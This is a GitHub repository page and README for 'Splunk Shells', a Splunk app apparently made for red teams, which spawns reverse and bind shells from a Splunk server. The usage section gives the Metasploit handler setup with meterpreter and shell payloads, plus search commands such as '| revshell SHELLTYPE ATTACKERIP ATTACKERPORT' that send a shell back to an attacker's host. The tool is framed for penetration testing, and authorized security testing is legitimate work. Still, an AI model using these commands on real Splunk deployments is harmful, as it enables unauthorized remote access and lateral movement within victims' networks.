Weaponizing Splunk with reverse and bind shells.
Switch branches/tags
Nothing to show
Clone or download
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
appserver/static
bin
default
splunk_shells_TA_nix Renamed the TA folders Apr 7, 2017
splunk_shells_TA_win Renamed the TA folders Apr 7, 2017
static Added icons and logos. Oct 2, 2016
.gitignore
LICENSE
README.md Added LICENSE and updated readme with new URL for release Jan 11, 2017

README.md

Splunk Shells App Version 1.2

TBG Security Ryan Hays

This app is to help with penetration testing and Red Teaming within environments that have a Splunk deployment.

This app will allow the engineer to spawn a Reverse of Bind Shell from a Splunk server to allow the engineer to interact with the server and expand influence within the environment.

Install

Download the release from https://github.com/TBGSecurity/splunk_shells/archive/1.2.tar.gz

Navigate to the "Manage Apps" and click on "Install app from file"

Alt text

Click on "Choose File" and select the downloaded release archive.

Alt text

Once it is installed you will have to restart Splunk

Alt text

For Splunk v6.5 ONLY Once Splunk is restarted click on Permissions for the splunk_shells app. Ensure the last permission "Sharing for config file-only objects" has "all apps" selected.

Alt text

Usage

Using each of these shells can be done from the Search and Reporting app. Setup a handler first then execute one of the following searches:

Setup Metasploit Handler

use multi/handler

Pick one of the below

set payload python/meterpreter_reverse_tcp
set payload python/meterpreter_bind_tcp
set payload python/shell_reverse_tcp
set payload python/shell_bind_tcp

set LHOST
set LPORT
exploit -j

Bind Shell

'| bindshell SHELLTYPE PORTNUMBER'

SHELLTYPE - Specify std or msf (std = Standard Shell|msf = Meterpreter Shell)

PORTNUMBER - Specify the port you want the bind shell to listen on. If you do not specify a port number it defaults to 8888

Reverse Shell

'| revshell SHELLTYPE ATTACKERIP ATTACKERPORT'

SHELLTYPE - Specify std or msf (std = Standard Shell|msf = Meterpreter Shell)

ATTACKERIP - Specify the IP that you want to shell to be sent back to.

ATTACKERPORT - Specify the port you want the shell to be sent back to.